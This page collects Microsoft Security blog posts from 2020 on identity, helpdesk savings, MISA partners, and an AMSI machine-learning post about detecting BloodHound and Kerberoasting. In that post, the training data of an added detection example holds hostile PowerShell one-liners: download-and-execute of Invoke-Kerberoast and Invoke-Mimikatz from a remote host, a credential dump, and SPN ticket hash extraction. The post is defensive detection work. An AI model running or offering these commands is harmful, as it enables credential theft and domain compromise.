Edward Contreras, CISO, EVP, Frost Bank

Customers like Frost Bank have found that tracking their compliance score makes compliance easier.

“Compliance is a really interesting field. Typically, you have somebody with a legal background, a risk background, or a security background, but very little technical background. And so trying to translate a regulation so that it fits within a technical environment is very difficult. With Compliance Manager, it actually allowed a lot of the tech talk to be translated for the side, the business side, but it also allowed a lot of the business side to be translated to the tech side. For us, it made the conversation very simple and it made the process almost seamless,” said Edward Contreras, CISO, EVP, Frost Bank.

The power of modern cloud-based identity protection

Nothing has done more to simplify the security challenges of remote work during the pandemic than modern identity solutions and Zero Trust architectures. A July 2020 Microsoft poll found that 94 percent of business leaders have already embarked on a Zero Trust journey. Identity is central to simplifying security today and shaping the next generation of the modern security infrastructure.

Microsoft is pushing the frontier of identity through the introduction of a decentralized model built on open standards to help balance the power between individuals and organizations in ways that enhance digital trust while protecting privacy and reducing the risk of losing personal data.

  • Today we are announcing a decentralized identity pilot together with the MilGears educational program of the US Department of Defense and Trident at AIU, which helps military veterans and service members enroll in higher education and jumpstart their civilian career.

This technology will significantly reduce the time and effort it takes for veterans to verify their service records and transcripts with universities and employers. It will also help veterans maintain control of their information.

In a pilot of decentralized identity, Trident at AIU can quickly and easily verify transcripts presented by MilGears participants.

The simplest way to manage identities and embark on a Zero Trust journey today is with Azure Active Directory (AD)—Microsoft’s cloud identity service, trusted by over 200 thousand organizations. They choose Azure AD for industry-leading security and seamless user experience.

Doug Howell, Director of IT, The Little Potato Company

No company or industry is immune to attack and everyone deserves modern protection. The Little Potato Company is a family-owned business with 400 employees headquartered in Alberta, Canada that uses Conditional Access as a critical component in its Zero Trust security strategy. The Little Potato Company recently saw the value of Zero Trust security firsthand when a user’s credentials were compromised and used to attempt to access corporate data. Luckily, the company had deployed Azure AD and Conditional Access, which quickly identified and blocked the login attempts from multiple locations and an unfamiliar operating system.

What you can do today

Security is a journey, and we believe in progress over perfection. The key is that every step you take in the process makes your organization safer and simpler. In fact, it makes all of us safer as we work together to stop malicious activity from causing harm and to protect data and privacy in a modern, connected world.

Here are four things you can do today to make your organization safer and more resilient:

  1. Use multi-factor authentication. Move toward passwordless.
  2. Have a plan for keeping software up to date and patch, patch, patch!
  3. Get a handle on all devices connecting to your network, from phones and laptops to edge devices, and how you’re detecting potential threats to all of them.
  4. Use benchmarks and insights like Microsoft Secure Score and Compliance Manager to understand your posture and track your progress.

2020 is marking a moment in time that none of us could have imagined; a moment that has amplified the need for a resilient response to unexpected change, and a moment in which digital safety is paramount to productivity and the peace of mind we all need to be at our best. We’re inspired by the way customers are using technology to turn obstacles into innovation, to turn ideas into solutions, and to embrace today’s challenges as an opportunity to build a better, safer world for all. That’s why we at Microsoft are reimagining security, identity, and compliance—to empower all people and organizations to thrive.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Microsoft Security blog to keep up with our expert coverage on security matters. Follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft announces cloud innovation to simplify security, compliance, and identity appeared first on Microsoft Security.

3 ways Microsoft 365 can help you reduce helpdesk costs

September 3rd, 2020 No comments

With more people than ever working remotely, organizations must maximize employee productivity while protecting an ever-growing digital footprint. Many have stitched together specialized security solutions from different vendors to improve their cybersecurity posture, but this approach is expensive and can result in gaps in coverage and a fragmented user experience. With Microsoft’s integrated security solutions, you can enhance security and user productivity more cost-effectively.

Focusing a lens on the helpdesk illuminates how consolidating with Microsoft helps streamline and strengthen your security posture. Your helpdesk plays an important role in enabling employees to be more effective, but it can also reveal organization-wide productivity challenges. Productivity matters because if security controls are too cumbersome, employees will find workarounds. In this blog, I’ll highlight three examples of how Microsoft 365 can help you reduce costs while strengthening cybersecurity.

1. Reduce password reset calls by 75 percent

One of the most common reasons that employees call the helpdesk is to reset their password. These calls result in a loss of productivity for employees who are locked out of their accounts. They also require employees and helpdesk analysts to take time out of their busy days to work through steps to reset the password. With a high volume of calls, the costs add up.

The best way to reduce password reset calls is to eliminate passwords entirely. Microsoft has built support for passwordless authentication methods such as biometrics, FIDO2 security keys, and PINs into all our products and services. Because the credential is bound to the user’s device (the biometric or PIN only unlocks a key protected by the device or security key, and nothing reusable is sent over the network), these methods are more secure than passwords and easier for employees, and they can reduce your costs. When Microsoft rolled out passwordless to our employees, the hard and soft costs of supporting passwords fell by 87 percent.

Deploying passwordless is a phased journey and not everyone is ready to start that process now, so it’s important to also improve productivity for password users. Azure Active Directory (Azure AD) is an identity and access management solution that allows users to sign in to all their on-premises and cloud apps with one set of credentials—whether they use passwords or passwordless methods. With single sign-on employees will have far fewer passwords to remember; however, sometimes they may still forget or Azure AD may force them to reset a password if an account appears compromised. In either case, Azure AD self-service password reset lets employees unblock their accounts, on their time, via an online portal.

According to a new study, The Total Economic Impact™ of Securing Apps with Microsoft Azure Active Directory, Azure AD self-service password reset can reduce the number of password reset calls per month by 75 percent. In this commissioned study, Forrester Consulting developed a composite organization based on interviews with four customers in different industries who have used Azure AD for years. Deploying Azure AD self-service password reset resulted in a return on investment of USD 1.7 million over three years.

 

2. Streamline Windows 10 upgrade path

Twice a year Microsoft releases new features and security capabilities for Windows 10. Typically, users are able to download the new operating system and quickly get back to work—but if you use a non-Microsoft product for endpoint detection or antivirus, it can complicate the process.

When a non-Microsoft vendor’s security product is not compatible with a new version of Windows 10, it prevents users from upgrading. This can be confusing for employees, who call the helpdesk for assistance. In addition to facilitating these calls, your team must also run software compatibility testing once a new version of the security software is released. Meanwhile, your company can’t take advantage of the productivity and security features available in the latest version of Windows 10.

To reduce dependencies without compromising security, turn on Microsoft Defender Antivirus and Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP). Microsoft Defender ATP helps you protect, detect, and respond to advanced attacks against all your endpoints. Microsoft Defender Antivirus, a Microsoft Defender ATP capability, uses artificial intelligence and machine learning to find and block malware, including viruses. Both solutions are designed to work together and are integrated with Windows 10, which reduces the likelihood of helpdesk calls during the upgrade process.


3. Empower users to manage their devices

A third driver of helpdesk calls is device management. Any time an employee needs help with a device, such as when they start a new job or want to use a personal device to access email, a helpdesk analyst is often involved. The analyst sets up devices with the appropriate applications and permissions and troubleshoots challenges with access.

As the way we work has changed, people no longer access corporate resources solely from the office using company-provided devices. Reading emails from a coffee shop on a personal phone or reviewing presentations from a tablet makes working more convenient, but it can also introduce security challenges. Employees may not upgrade their devices or apply security patches in a timely manner. They sometimes, unknowingly, download apps with security flaws. Attackers leverage these vulnerabilities to gain access to sensitive company resources.


Microsoft Endpoint Manager makes it easier to provision, update, and manage personal and business laptops and mobile devices with support for Windows, MacOS, iOS, and Android Enterprise. Integration with Azure AD enables employees to use the Intune Company Portal to enroll both corporate-owned and personal devices without helpdesk intervention. Intune automatically installs appropriate apps, or you can allow employees to choose apps through the portal.

With Microsoft Endpoint Manager, you can also enforce security policies on all enrolled devices. For example, you can require that employees use the most current operating system to access corporate resources. You can define PIN requirements or install threat protection software. If users don’t want to enroll their device, mobile app management capabilities let you isolate organizational data from personal data. These policies are defined globally and automatically applied when users register devices, streamlining the process for everyone.


Microsoft 365 security solutions work across identities, endpoints, emails, apps, data, clouds, networks, and IoT devices to detect, block, and elevate threats. Consolidate with Microsoft to strengthen security, simplify the user experience, and reduce helpdesk costs.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 3 ways Microsoft 365 can help you reduce helpdesk costs appeared first on Microsoft Security.

Stopping Active Directory attacks and other post-exploitation behavior with AMSI and machine learning

August 27th, 2020 No comments

When attackers successfully breach a target network, their typical next step is to perform reconnaissance of the network, elevate their privileges, and move laterally to reach specific machines or spread as widely as possible. For these activities, attackers often probe the affected network’s Active Directory, which manages domain authentication and permissions for resources. By default, any authenticated domain user can read most directory objects, and attackers take advantage of this ability to enumerate and interact with Active Directory for reconnaissance, which in turn enables lateral movement and privilege escalation. This is a common attack stage in human-operated ransomware campaigns like Ryuk.

These post-exploitation activities largely rely on scripting engines like PowerShell and WMI because scripts provide attackers flexibility and enable them to blend into the normal hum of enterprise endpoint activity. Scripts are lightweight, can be disguised and obfuscated relatively easily, and can be run fileless by loading them directly in memory through command-line or interacting with scripting engines in memory.

Antimalware Scan Interface (AMSI) helps security software to detect such malicious scripts by exposing script content and behavior. AMSI integrates with scripting engines on Windows 10 as well as Office 365 VBA to provide insights into the execution of PowerShell, WMI, VBScript, JavaScript, and Office VBA macros. Behavioral blocking and containment capabilities in Microsoft Defender Advanced Threat Protection (ATP) take full advantage of AMSI’s visibility into scripts and harness the power of machine learning and cloud-delivered protection to detect and stop malicious behavior. In the broader delivery of coordinated defense, the AMSI-driven detection of malicious scripts on endpoints helps Microsoft Threat Protection, which combines signals from Microsoft Defender ATP and other solutions in the Microsoft 365 security portfolio, to detect cross-domain attack chains.

On endpoints, performance-optimized machine learning models inspect script content and behavior through AMSI. When scripts run and malicious or suspicious behavior is detected, features are extracted from the content, including expert features, features selected by machine learning, and fuzzy hashes. The lightweight client machine learning models make inferences on the content. If the content is classified as suspicious, the feature description is sent to the cloud for full real-time classification. In the cloud, heavier counterpart machine learning models analyze the metadata and use additional signals like file age, prevalence, and other such information to determine whether the script should be blocked or not.

These pairs of AMSI-powered machine learning classifiers, one pair for each scripting engine, allow Microsoft Defender ATP to detect malicious behavior and stop post-exploitation techniques and other script-based attacks, even after they have started running. In this blog, we’ll discuss examples of Active Directory attacks, including fileless threats, foiled by AMSI machine learning.


Figure 1. Pair of AMSI machine learning models on the client and in the cloud

Blocking BloodHound attacks

BloodHound is a popular open-source tool for enumerating and visualizing a domain’s Active Directory and is used by red teams and attackers as a post-exploitation tool. The enumeration builds a graph of domain devices, the users actively signed in to them, groups, and other resources, along with their permissions. Attackers can discover and abuse weak permission configurations for privilege escalation, by taking over other user accounts or adding themselves to highly privileged groups, or use the graph to plan a lateral movement path toward their target privileges. Attackers, including those behind human-operated ransomware campaigns such as Ryuk, use BloodHound as part of their attacks.

BloodHound relies on a collector component called SharpHound to enumerate the domain and gather several categories of data: local admin collection, group membership collection, session collection, object property collection, ACL collection, and trust collection. The collected data is typically exfiltrated and then visualized and analyzed by the attacker to plan the next steps. SharpHound performs the domain enumeration and is officially published both as a fileless, in-memory PowerShell version and as a file-based executable. Detecting the fileless PowerShell variant while it is active on a network is critical, because it leaves no file on disk for traditional scanning to examine.


Figure 2. SharpHound ingestor code snippets

When the SharpHound fileless PowerShell ingestor is run in memory, whether by a pen tester or an attacker, AMSI sees its execution buffer. The machine learning model on the client featurizes this buffer and sends it to the cloud for final classification.


Figure 3. Sample featurized SharpHound ingestor code

The counterpart machine learning model in the cloud analyzes the metadata, integrates other signals, and returns a verdict. Malicious scripts are detected and stopped on endpoints in real time:


Figure 4. Microsoft Defender Antivirus detection of SharpHound

Detections are reported in Microsoft Defender Security Center, where SOC analysts can use Microsoft Defender ATP’s rich set of tools to investigate and respond to attacks:


Figure 5. Microsoft Defender Security Center alert showing detection of SharpHound

This protection is provided by AI that has learned to identify and block these attacks automatically, and that will continue to adapt and learn new attack methods we observe.

Stopping Kerberoasting

Kerberoasting, like BloodHound-based enumeration, is used by both red teams and attackers, but its goal is credential theft. Kerberoasting abuses the Kerberos Ticket Granting Service (TGS) to obtain material that can be cracked offline, typically targeting domain service accounts whose recovered passwords are then used for lateral movement.

A Kerberoasting attack starts by scanning the Active Directory environment for user accounts that have a Kerberos Service Principal Name (SPN) registered. Because any authenticated domain user may request a service ticket for any SPN, the attacker then requests TGS tickets for those accounts; each ticket is encrypted with a key derived from the service account’s password, and RC4-HMAC tickets (encryption type 0x17) are the cheapest to crack. The tickets are either extracted directly from the TGS response by the requesting tool or dumped from memory with tools like Mimikatz, and then exfiltrated for offline brute forcing of the encrypted segment. If the brute force succeeds, the attacker recovers the account’s password, which they then use to remotely sign in to machines or access resources. Long, random service account passwords (or group managed service accounts) and AES-only encryption for service accounts raise the cost of this attack substantially.
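The request step described above leaves a trace that does not depend on AMSI at all: with Kerberos service ticket auditing enabled, every TGS request is recorded on the domain controller as Security event 4769, including the requesting account, the target service account, the client address, and the ticket encryption type. The following Python detector is an added example written for this page, not part of the original post or of Microsoft Defender ATP. It flags a requester that pulls RC4-HMAC (0x17) tickets for many distinct service accounts inside a short window, which is what a bulk Kerberoast looks like from the KDC’s side. The event records are constructed inline (field names follow the 4769 event XML, where TargetUserName is the requesting account and ServiceName the target account); the 5-ticket and 5-minute thresholds are assumptions to be tuned per environment.

```python
"""Kerberoasting detector over Security event 4769 records (added example).

A Kerberoast shows up on the KDC as one principal requesting service tickets
for many distinct SPN-bearing accounts, usually asking for RC4-HMAC (0x17)
because those tickets are the cheapest to crack offline.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4; 0x11/0x12 are AES128/AES256

# Constructed sample of 4769 events (not real telemetry). Field names mirror the
# event XML: TargetUserName = requesting account, ServiceName = target account.
EVENTS = [
    # normal activity: a user touching one or two services with AES tickets
    {"t": "2020-08-27T09:00:05", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.21"},
    {"t": "2020-08-27T09:00:09", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.21"},
    # attacker burst: one account, one host, RC4 tickets for eight service accounts in 35 seconds
    *[{"t": "2020-08-27T09:14:%02d" % (10 + i * 5), "TargetUserName": "jdoe@CORP.LOCAL",
       "ServiceName": svc, "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.55"}
      for i, svc in enumerate(["svc_sql", "svc_http", "svc_backup", "svc_sccm",
                               "svc_exch", "svc_sharepoint", "svc_jenkins", "svc_vmware"])],
    # a monitoring account requesting many AES tickets: noisy, but not a Kerberoast
    *[{"t": "2020-08-27T09:20:%02d" % (i * 3), "TargetUserName": "app_monitor@CORP.LOCAL",
       "ServiceName": "svc_%d" % i, "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.90"}
      for i in range(12)],
    # krbtgt and machine-account tickets are requested constantly; excluded below
    {"t": "2020-08-27T09:14:12", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.55"},
]


def is_roastable_target(service):
    """Only user-style service accounts matter; skip machine accounts and krbtgt."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoasting(events, min_services=5, window=timedelta(minutes=5)):
    """Return (requester, client_ip, n_services) for every requester that asked for
    RC4 tickets to at least min_services distinct roastable accounts within `window`."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"] != RC4_HMAC or not is_roastable_target(ev["ServiceName"]):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        by_requester[key].append((datetime.fromisoformat(ev["t"]), ev["ServiceName"]))

    hits = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()
        best, start = 0, 0
        for end in range(len(reqs)):  # sliding window over time-ordered requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            best = max(best, len(distinct))
        if best >= min_services:
            hits.append((user, ip, best))
    return hits


if __name__ == "__main__":
    for user, ip, n in detect_kerberoasting(EVENTS):
        print("possible Kerberoast: %s from %s requested RC4 tickets for %d services" % (user, ip, n))
```

Event 4769 is only generated when the “Audit Kerberos Service Ticket Operations” subcategory is enabled on domain controllers. In environments with many legacy RC4 clients the rule needs a higher threshold or a per-account baseline, and an attacker who requests AES tickets or spreads requests over hours will stay under it, so treat this as one signal alongside the AMSI-based script detection the post describes rather than a replacement for it.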

All the Kerberoasting attack steps leading to hash extraction can be accomplished with a single PowerShell script (Invoke-Kerberoast.ps1), which has been integrated into popular post-exploitation frameworks like PowerSploit and PowerShell Empire:

Figure 6. Single command line to download and execute Kerberoasting to extract user password hashes


Figure 7. Kerberoasting code

Because AMSI has visibility into PowerShell scripts, when the Invoke-Kerberoast.ps1 is run, AMSI allows for inspection of the PowerShell content during runtime. This buffer is featurized and analyzed by client-side machine learning models, and sent to the cloud for real-time ML classification.


Figure 8. Sample featurized Kerberoasting code

Microsoft Defender ATP raises an alert for the detection of Invoke-Kerberoast.ps1:

Figure 9. Microsoft Defender Security Center alert showing detection of Invoke-Kerberoast.ps1

Training the machine learning models

To ensure continued high-quality detection of threats, the AMSI machine learning models are trained per scripting engine using real-time protection data and threat investigations.

Featurization is key to machine learning models making intelligent decisions about whether content is malicious or benign. For behavior-based script logs, we extract the set of libraries, COM objects, and function names used by the script. Learning the most important features within the script content is performed by character n-gramming the script or behavior log, followed by the semi-asynchronous stochastic dual coordinate ascent (SA-SDCA) algorithm with L1-regularization feature trimming to learn and deploy the most important character n-gram features.

On top of the same features used to train the client models, other complex features used to train the cloud models include fuzzy hashes, cluster hashes, partial hashes, and more. In addition, the cloud models have access to other information such as age, prevalence, global file information, and reputation, which allows them to make more accurate blocking decisions.
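As an added illustration of the client/cloud pairing described earlier in this post and of the featurization just described, here is a compact Python model of the pipeline; it is example code written for this page, not Microsoft’s implementation. It keeps the ingredients the text names (cmdlet and .NET type names as expert features, character n-grams, a sparse linear model whose weak features are trimmed so the client can afford to run it, and a cloud stage that adds age and prevalence) but replaces SA-SDCA with smoothed per-feature log-odds plus a magnitude cutoff, and trains on a handful of constructed PowerShell one-liners rather than real telemetry. The training snippets, the 0.5 trimming and decision thresholds, and the prevalence/age cut-offs are assumptions chosen for illustration.

```python
"""Two-stage AMSI-style script classifier (added example, not Microsoft's code).

Client stage: expert features plus character n-grams, scored by a sparse
linear model; features with weak class signal are trimmed out of the model.
Cloud stage: the client score is combined with age and prevalence signals.
"""
import math
import re

CMDLET_RE = re.compile(r"\b[A-Z][a-z]+-[A-Z][A-Za-z]+\b")  # Verb-Noun cmdlets
DOTNET_RE = re.compile(r"\[[A-Za-z][\w.]*\]")              # [System.Some.Type]


def featurize(script, n=4):
    """Expert features (cmdlet and .NET type names) plus character n-grams."""
    feats = {"cmd:" + m for m in CMDLET_RE.findall(script)}
    feats |= {"net:" + m.lower() for m in DOTNET_RE.findall(script)}
    low = script.lower()
    feats |= {"ng:" + low[i:i + n] for i in range(len(low) - n + 1)}
    return feats


def train(samples, min_weight=0.5):
    """Per-feature smoothed log-odds: a simple sparse linear model.

    Stands in for the SA-SDCA/L1 training in the text: weights below
    min_weight in magnitude carry little class signal and are trimmed, which
    is what keeps the client model small enough to run on every AMSI buffer.
    """
    mal = [featurize(t) for t, y in samples if y == 1]
    ben = [featurize(t) for t, y in samples if y == 0]
    weights = {}
    for f in set().union(*mal, *ben):
        p_mal = (sum(f in s for s in mal) + 1) / (len(mal) + 2)  # Laplace smoothing
        p_ben = (sum(f in s for s in ben) + 1) / (len(ben) + 2)
        w = math.log(p_mal / p_ben)
        if abs(w) >= min_weight:
            weights[f] = w
    prior = math.log(len(mal) / len(ben))
    return weights, prior


def client_score(model, prior, script):
    """Lightweight on-box inference; features never seen in training are ignored."""
    z = prior + sum(model.get(f, 0.0) for f in featurize(script))
    z = max(-30.0, min(30.0, z))  # clamp before exp
    return 1.0 / (1.0 + math.exp(-z))


def cloud_verdict(score, prevalence, age_days, threshold=0.5):
    """Cloud stage: only suspicious content gets here, and context can still clear it.
    The cut-offs are assumptions for illustration."""
    if score < threshold:
        return "allow"
    if prevalence >= 1000 and age_days >= 30:  # old and widely seen: likely admin tooling
        return "allow"
    return "block"


# Constructed training set: 1 = post-exploitation script, 0 = everyday admin script.
TRAINING = [
    ("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Kerberoast.ps1'); "
     "Invoke-Kerberoast -OutputFormat Hashcat | Out-File k.txt", 1),
    ("Import-Module .\\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All -Domain corp.local", 1),
    ("[System.Net.ServicePointManager]::Expect100Continue = $false; "
     "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1'); "
     "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'", 1),
    ("Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat", 1),
    ("Get-ChildItem C:\\Logs -Recurse | Where-Object Length -gt 1MB | Export-Csv big.csv", 0),
    ("Get-Service | Where-Object Status -eq 'Running' | Sort-Object Name | Format-Table", 0),
    ("Get-ADUser -Filter * -Properties Department | Select-Object Name, Department | Export-Csv users.csv", 0),
    ("Invoke-WebRequest https://example.com/report.json -OutFile report.json", 0),
]
MODEL, PRIOR = train(TRAINING)


def classify(script, prevalence, age_days):
    """Full pipeline for one AMSI buffer: client score, then cloud verdict."""
    score = client_score(MODEL, PRIOR, script)
    return score, cloud_verdict(score, prevalence, age_days)
```

Two properties of the real pipeline are visible even in this toy: n-grams that occur in both classes (for example the `-Object` fragment shared by `New-Object` and `Where-Object`) are trimmed and never reach the client, and the cloud stage can overturn a suspicious client score for content that is old and widespread, which is how an admin’s long-standing script avoids being blocked while a freshly downloaded Invoke-Kerberoast.ps1 is not.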

Conclusion: Broad visibility informs AI-driven protections

Across Microsoft, AI and machine learning protection technologies use Microsoft’s broad visibility into various surfaces to identify new and unknown threats. Microsoft Threat Protection uses these machine learning-driven protections to detect threats across endpoints, email and data, identities, and apps.

On endpoints, Microsoft Defender ATP uses multiple next-generation protection engines that detect a wide range of threats. One of these engines uses insights from AMSI and pairs of machine learning models on the client and in the cloud working together to detect and stop malicious scripts post-execution.

These pairs of AMSI models, one pair for each scripting engine, are part of the behavior-based blocking and containment capabilities in Microsoft Defender ATP, which are designed to detect and stop threats even after they have started running. When running, threats are exposed and can’t hide behind encryption or obfuscation. This adds another layer of protection for instances where sophisticated threats are able to slip through pre-execution defenses.


Figure 10. Microsoft Defender ATP next-generation protection engines

In this blog post, we showed how these AMSI-driven behavior-based machine learning protections are critical in detecting and stopping post-exploitation activities like BloodHound-based and Kerberoasting attacks, which employ evasive malicious scripts, including fileless components. With AMSI, script content and behavior are exposed, allowing Microsoft Defender ATP to foil reconnaissance activities and prevent attacks from progressing.

To learn more about behavior-based blocking and containment, read the following blog posts:

 

Ankit Garg and Geoff McDonald

Microsoft Defender ATP Research Team

The post Stopping Active Directory attacks and other post-exploitation behavior with AMSI and machine learning appeared first on Microsoft Security.

Microsoft Intelligent Security Association expands to include managed security service providers

July 14th, 2020 No comments

We’d planned a splashy party at Microsoft Inspire to announce our newest Microsoft Intelligent Security Association (MISA) members and introduce them to association members, but given our world today, I am instead picturing you reading this announcement curled up in a chair with a cup of coffee. Almost as satisfying, right?

Welcoming Managed Security Service Providers to MISA

Two years ago, we launched MISA to offer our customers holistic solutions that help them better defend against a world of increasing threats. Our vision was to build a robust security ecosystem that included leading security technology companies that provide value to our joint customers. We began by partnering with independent software vendors that have integrated their solutions with Microsoft. Since launch, MISA has expanded significantly—in just the last year, membership increased from 57 members to 133!

Through MISA, we’ve been able to collaborate with some of the most innovative security companies in the world, but our joint customers also need security services that are deeply interwoven with MISA software solutions. To meet this demand, MISA is launching an invitation-only pilot program in July 2020 for select managed security service providers (MSSPs).

“Today we’re happy to bring a win-win-win offering by enabling MSSPs and managed detection and response partners to sell and deploy not just Microsoft’s security solutions but more importantly our joint solutions with our independent software vendor partners.” – Eran Barak, Principal PM Manager, Microsoft Threat Protection.

By including MSSPs in the program, our joint customers will benefit from security consultants with deep expertise in MISA solutions, enabling them to get the most out of their investments. The expansion also creates more opportunities for security organizations to work together on the creative solutions we will need to confront an evolving threat landscape.

“MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”– Mandana Javaheri, Global Director of Cybersecurity Solutions Group at Microsoft Corp.

I am proud of the work that MISA has accomplished to date and look forward to partnering with our newest members to help our joint customers better safeguard their organizations. Please join me in welcoming the following MSSPs to MISA:

Accenture

MISA service offering: Azure Sentinel

Accenture Security helps organizations prepare, protect, detect, respond, and recover across the entire Microsoft Security portfolio and the full security lifecycle. Learn more.

Ascent Solutions

MISA service offering: Azure Sentinel, Azure Security Center

Ascent Solutions’ risk-based defense strategy aligns your priorities with the right technology, processes, and route map to make your business more secure today. And because cybersecurity is at the heart of everything we do, we also help you defend against the right attack vectors and combat malicious actors to better protect your businesses into the future. Learn more.

Avanade

MISA service offering: Azure Sentinel

From enabling a modern workplace, to protecting your applications in the cloud, Avanade provides a holistic approach to security at every step. Learn more. 

BlueVoyant

MISA service offering: Azure Sentinel, Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP)

BlueVoyant provides managed detection and response (MDR) services utilizing Azure Sentinel, a cloud-native security information and event management (SIEM) solution, and Microsoft Threat Protection, an integrated platform that unifies best-in-class products that include Microsoft Defender ATP, Office 365 Advanced Threat Protection, Azure Advanced Threat Protection, and Microsoft Cloud App Security. Learn more.

Born in the Cloud

MISA service offering: Azure Sentinel, Azure Security Center

Born in the Cloud leverages Azure Security services including Azure Sentinel and machine learning algorithms to monitor your environment and make sense of the data faster than any human can, allowing us to respond to threats quickly. We also manage Windows 10, Office 365, Microsoft Defender ATP, and Microsoft Endpoint Manager for you, to help keep devices, data, and identities safe. All built on Azure Cloud. Learn more.

BT

MISA service offering: Azure Sentinel

One of the few local service providers in managed security services, BT Consulting uses cutting-edge technology to monitor firewalls and manage endpoint security. Learn more.

Critical Start

MISA service offering: Microsoft Defender ATP, Azure Sentinel

CRITICALSTART enables customers to centralize, ingest, and correlate their logs to ensure their environment is secure. CRITICALSTART’s MDR utilizes a Trusted Behavior Registry to investigate every alert generated until it is classified as known good and can be safely resolved. Customers see every action our CYBERSOC analysts take, since our platform provides transparency across the entire process. Learn more.

Cyberproof

MISA service offering: Azure Sentinel

Cyberproof monitors your security alerts and suspicious events, collected from multiple internal and external customer data sources including Microsoft Azure Sentinel SIEM. Threats are detected as they emerge in critical cloud and on-premises infrastructure. Learn more.

Dell

MISA service offering: Microsoft Defender ATP, Azure ATP

At Dell, security is a priority – a part of every conversation; it connects our team members, customers, processes and technologies. Dell’s Security and Trust Center provides easy access to resources and solutions to help you quickly find answers to your security questions. Learn more.

Expel

MISA service offering: Microsoft Defender ATP, Azure Sentinel

The combination of the Expel Workbench™ and Expel analysts monitors your environment 24×7 to provide transparent managed security that finds attackers and gives you the answers to help you kick them out and keep them out. Learn more.

EY

MISA service offering: Microsoft Defender ATP, Azure Security Center

EY provides day-to-day resilience as well as a proactive, pragmatic, and strategic approach that considers risk and security from the outset. This is Security by Design. Rather than avoiding risk altogether, Security by Design is about enabling trust in systems, designs, and data so that organizations can take on more risk, lead transformational change, and innovate with confidence. EY Next-generation security operations and response teams can provide organizations with the right amount of support to help them manage leading-class security operations in a programmatic way. Learn more.

Fishtech

MISA service offering: Microsoft Defender ATP

Fishtech is the leading current generation cybersecurity services provider for enabling secure and successful business transformation. Data-driven and born in the cloud, Fishtech provides the people, processes, and technology to minimize risk, maintain compliance, and increase business efficiency. Our human-led, machine-driven security-as-a-service division, CYDERES, helps organizations manage cybersecurity risks, detect threats, and respond to security incidents in real-time. Learn more.

Infosys

MISA service offering: Azure Active Directory, Azure Sentinel

Infosys CyberSecurity offers a flexible managed security services model that empowers organizations with people, processes, and technology to secure their critical assets and data. With our quality services, we help protect your data and infrastructure with the latest technology and certified professionals, while adhering to the latest industry-specific compliance standards. Learn more.

Insight

MISA service offering: Azure Sentinel

Insight Services for Azure Sentinel help you take advantage of cutting-edge technology from Microsoft to strengthen and simplify your security environment. During an engagement, our consultants address all major areas of your SOC, including new tools or processes that would be beneficial to adopt. Learn more.

Inspark

MISA service offering: Azure Sentinel

The new Azure Sentinel and the Fusion capabilities empower Inspark to help keep our customers safe for the future. Our Cloud Security Center incorporates Azure Sentinel and the Microsoft Security Graph into our solution to better protect our customers. Learn more.

KPMG (US & EMEA)

MISA service offering: Azure Sentinel

The KPMG + Azure Sentinel solution has been designed to help businesses improve their security monitoring and incident response capabilities by combining KPMG’s cybersecurity, incident response, and industry experience with Microsoft’s advanced cybersecurity technologies. Learn more.

Open Systems

MISA service offering: Azure Sentinel

Open Systems designed a scalable MDR platform that helps detect threats early to limit the damage. It combines human know-how, advanced automated threat detection, and the best sensor technology. In addition, a cloud-scale SIEM built on Microsoft Azure Sentinel ensures smooth log file integration from your existing security controls and other sources of relevant data. Learn more.

Optiv Security

MISA service offering: Microsoft Defender ATP, Azure Sentinel, Azure Active Directory

Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity. Align your security program to achieve specific business outcomes with our full suite of service capabilities, from strategy to technology—and everything in between. Our managed security services provide vetted on-staff vulnerability and security researchers and multiple operations centers to support your organization every moment, of every day, so you can refocus your existing IT staff on core business needs. Learn more.

Truesec

MISA service offering: Microsoft Defender ATP

As a leading cybersecurity consulting company, Truesec offers a wide range of services including security health checks, security engineering, and penetration testing, all provided by cybersecurity specialists. Our managed service will give your organization the capability to detect and respond quickly to cyberattacks. Our success is based on a combination of extraordinary cyber experts, the most advanced tools in the market today, and investing in truly understanding the specifics of our clients’ IT environments. Learn more.

Trustwave

MISA service offering: Microsoft Defender ATP, Azure Sentinel

Trustwave Threat Detection and Response Services for Microsoft Azure uses the Microsoft Graph Security API to ingest data from Microsoft Azure Sentinel and Microsoft Defender ATP to provide real-time triage, analysis, investigation, response, and remediation of security threats. Learn more.

Wipro

MISA service offering: Azure Active Directory, Azure Sentinel

Wipro provides end-to-end security solutions and services for business to enterprise, partners, and consumers through Microsoft security stacks. Learn more.

For more information

To learn more about the Microsoft Intelligent Security Association watch this video or visit the webpage. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

